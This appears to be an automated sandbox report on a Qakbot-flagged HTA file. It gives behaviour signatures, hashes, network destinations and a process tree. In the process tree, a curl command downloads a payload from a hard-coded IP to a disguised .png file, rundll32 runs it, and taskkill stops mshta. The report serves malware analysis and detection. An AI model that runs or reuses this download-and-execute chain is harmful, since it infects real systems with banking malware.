Analysis Overview
SHA256
4ed16497feaa7bbd98b485d057bf25cb3f24132c6a9f52d4c7b838e6a7f5f761
Threat Level: Known bad
The file DocumentsFolder_729396_Feb_03.one_2.hta was found to be: Known bad.
Malicious Activity Summary
Qakbot/Qbot
Downloads MZ/PE file
Loads dropped DLL
Checks computer location settings
Enumerates physical storage devices
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-03 18:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-03 18:03
Reported
2023-02-03 18:04
Platform
win7-20220812-en
Max time kernel
1s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_729396_Feb_03.one_2.hta"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-03 18:03
Reported
2023-02-03 18:06
Platform
win10v2004-20221111-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Qakbot/Qbot
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_729396_Feb_03.one_2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\curl.exe
"C:\Windows\System32\curl.exe" --output C:\ProgramData\aMqKd.png --url http://45.8.191.141/80567.dat
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\ProgramData\aMqKd.png,Wind
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im mshta.exe
C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
Network
| Country | Destination | Domain | Proto |
| TR | 45.8.191.141:80 | 45.8.191.141 | tcp |
| US | 72.21.81.240:80 | tcp | |
| JP | 40.79.189.59:443 | tcp | |
| US | 72.21.81.240:80 | tcp | |
| US | 72.21.81.240:80 | tcp | |
| US | 72.21.81.240:80 | tcp | |
| NL | 104.80.225.205:443 | tcp |
Files
memory/444-132-0x0000000000000000-mapping.dmp
memory/2724-133-0x0000000000000000-mapping.dmp
C:\ProgramData\aMqKd.png
| MD5 | 34b7dfe6ca2d3996915cb538df6f2876 |
| SHA1 | aab8372031ca4c36ca41b70c7b36bc12d7de1f99 |
| SHA256 | b4eb4929936981f3c05505c7a8ea6b506a21b2bff3d14ec9276f38996450b7a5 |
| SHA512 | 9d662dc7150eca82cdd56d6a17be4a7f1f6949ce7f4737797f271a2696ce569d471691ef78c30d50b42af372e3802d6c2f46ea3ca6f6a28a73ca7df98191dc73 |
C:\ProgramData\aMqKd.png
| MD5 | 34b7dfe6ca2d3996915cb538df6f2876 |
| SHA1 | aab8372031ca4c36ca41b70c7b36bc12d7de1f99 |
| SHA256 | b4eb4929936981f3c05505c7a8ea6b506a21b2bff3d14ec9276f38996450b7a5 |
| SHA512 | 9d662dc7150eca82cdd56d6a17be4a7f1f6949ce7f4737797f271a2696ce569d471691ef78c30d50b42af372e3802d6c2f46ea3ca6f6a28a73ca7df98191dc73 |
memory/2724-136-0x0000000000DA0000-0x0000000000DC3000-memory.dmp
memory/3888-141-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\A8D175DE.dll
| MD5 | f530495445432d6ae00f2b0f08f7c804 |
| SHA1 | f66f538b95b1a924c8392fbe7743d193d78eb50c |
| SHA256 | 5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b |
| SHA512 | 2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8 |
memory/2128-144-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3F9614FB.dll
| MD5 | f530495445432d6ae00f2b0f08f7c804 |
| SHA1 | f66f538b95b1a924c8392fbe7743d193d78eb50c |
| SHA256 | 5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b |
| SHA512 | 2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8 |
memory/2128-145-0x0000000000E00000-0x0000000000E23000-memory.dmp
memory/2128-146-0x0000000000E00000-0x0000000000E23000-memory.dmp